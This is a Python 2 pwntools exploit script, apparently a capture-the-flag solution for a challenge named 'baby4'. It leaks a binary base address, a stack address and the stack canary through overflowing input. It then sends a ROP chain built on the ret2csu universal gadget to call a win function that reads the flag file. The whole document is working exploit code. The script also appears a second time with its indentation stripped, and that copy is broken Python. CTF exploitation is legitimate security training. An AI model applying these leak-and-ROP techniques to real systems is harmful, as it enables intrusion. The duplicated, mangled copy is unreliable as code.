0xb0bb/baby4.py

## baby4.py
#!/usr/bin/env python2
from pwn import *
import sys

# context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])    # open new window

def fail(msg):
    log.info("Exploit failed: {}".format(msg))
    exit(1)

def success(msg):
    log.success("{}".format(msg))
    exit(1337)

def main():

    INTRO = False
    HOST, PORT = sys.argv[1].split(':')

    try:

        for z in range(20):

            io = remote(HOST, PORT)

            # step 0: show sexy banner
            banner = io.recvuntil('<-- ')[:-4]
            if INTRO is False:
                print banner
                INTRO = True

            # step 1: leak the base
            io.sendline('x'*0x18)

            base  = io.recvline().strip()[4+0x18:4+6+0x18]
            base += '\x00'*(8-len(base))
            base  = u64(base) - 0xd5d

            # log.info('base:   0x%012x' % base)

            # step 2: leak the stack
            print io.recvuntil('<-- ')[:-4]
            io.sendline('x'*0x40)

            stack  = io.recvline().strip()[4+0x40:4+6+0x40]
            stack += '\x00'*(8-len(stack))
            stack  = u64(stack) - 0x130

            # log.info('stack:  0x%012x' % stack)

            # step 3: leak canary
            io.recvuntil('<-- ')
            io.sendline('x'*0x49)

            canary = io.recvline().strip()[4+0x49:4+7+0x49]
            canary = '\x00'+canary
            canary = u64(canary)

            # log.info('canary: 0x%012x' % canary)

            # step 4: use universal gadget to set rdx and call win function to read the file
            rop  = cyclic(0x40)
            rop += p64(base+0xd80)     # fini
            rop += p64(canary)
            rop += p64(0x00)           #rbp

            rop += p64(base+0xd66)     # universal part 1
            rop += 'junkjunk'
            rop += p64(0x00)           # rbx
            rop += p64(0x01)           # rbp
            rop += p64(stack+0x40)     # r12 -> stack -> fini
            rop += p64(0x00)           # r13 -> rdi
            rop += p64(0x00)           # r14 -> rsi
            rop += 'SSSSSSSS'          # r15 -> rdx

            rop += p64(base+0xd50)     # universal part 2
            rop += 'junkjunk'
            rop += p64(0x00)           # rbx
            rop += p64(base+0x202400)  # rbp
            rop += p64(0x00)           # r12
            rop += p64(0x00)           # r13
            rop += p64(0x00)           # r14
            rop += p64(0x00)           # r15

            rop += p64(base+0xaed)     # win(0, 0, "/home/baby4/flag")
            rop += p64(base+0xacc)     # quit()

            rop  = rop.replace('SSSSSSSS', p64(stack+len(rop)))
            rop += './flag\x00'

            # step 5: send rop chain and get flag
            io.recvuntil('<-- ')
            io.sendline(rop)
            io.recvuntil('<-- ')
            io.sendline('')

            flag = io.recvline().strip()

            return flag
    except:
        io.close()

    return None

if __name__== '__main__':

    if len(sys.argv) < 2:
        fail('No target')

    flag = main()
    if flag.startswith("sctf{"):
        success(flag)

    fail("")
	#!/usr/bin/env python2
	from pwn import *
	import sys

	# context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
	# context(terminal=['tmux', 'new-window']) # open new window

	def fail(msg):
	log.info("Exploit failed: {}".format(msg))
	exit(1)

	def success(msg):
	log.success("{}".format(msg))
	exit(1337)

	def main():

	INTRO = False
	HOST, PORT = sys.argv[1].split(':')

	try:

	for z in range(20):

	io = remote(HOST, PORT)

	# step 0: show sexy banner
	banner = io.recvuntil('<-- ')[:-4]
	if INTRO is False:
	print banner
	INTRO = True

	# step 1: leak the base
	io.sendline('x'*0x18)

	base = io.recvline().strip()[4+0x18:4+6+0x18]
	base += '\x00'*(8-len(base))
	base = u64(base) - 0xd5d

	# log.info('base: 0x%012x' % base)

	# step 2: leak the stack
	print io.recvuntil('<-- ')[:-4]
	io.sendline('x'*0x40)

	stack = io.recvline().strip()[4+0x40:4+6+0x40]
	stack += '\x00'*(8-len(stack))
	stack = u64(stack) - 0x130

	# log.info('stack: 0x%012x' % stack)

	# step 3: leak canary
	io.recvuntil('<-- ')
	io.sendline('x'*0x49)

	canary = io.recvline().strip()[4+0x49:4+7+0x49]
	canary = '\x00'+canary
	canary = u64(canary)

	# log.info('canary: 0x%012x' % canary)

	# step 4: use universal gadget to set rdx and call win function to read the file
	rop = cyclic(0x40)
	rop += p64(base+0xd80) # fini
	rop += p64(canary)
	rop += p64(0x00) #rbp

	rop += p64(base+0xd66) # universal part 1
	rop += 'junkjunk'
	rop += p64(0x00) # rbx
	rop += p64(0x01) # rbp
	rop += p64(stack+0x40) # r12 -> stack -> fini
	rop += p64(0x00) # r13 -> rdi
	rop += p64(0x00) # r14 -> rsi
	rop += 'SSSSSSSS' # r15 -> rdx

	rop += p64(base+0xd50) # universal part 2
	rop += 'junkjunk'
	rop += p64(0x00) # rbx
	rop += p64(base+0x202400) # rbp
	rop += p64(0x00) # r12
	rop += p64(0x00) # r13
	rop += p64(0x00) # r14
	rop += p64(0x00) # r15

	rop += p64(base+0xaed) # win(0, 0, "/home/baby4/flag")
	rop += p64(base+0xacc) # quit()

	rop = rop.replace('SSSSSSSS', p64(stack+len(rop)))
	rop += './flag\x00'

	# step 5: send rop chain and get flag
	io.recvuntil('<-- ')
	io.sendline(rop)
	io.recvuntil('<-- ')
	io.sendline('')

	flag = io.recvline().strip()

	return flag
	except:
	io.close()

	return None

	if __name__== '__main__':

	if len(sys.argv) < 2:
	fail('No target')

	flag = main()
	if flag.startswith("sctf{"):
	success(flag)

	fail("")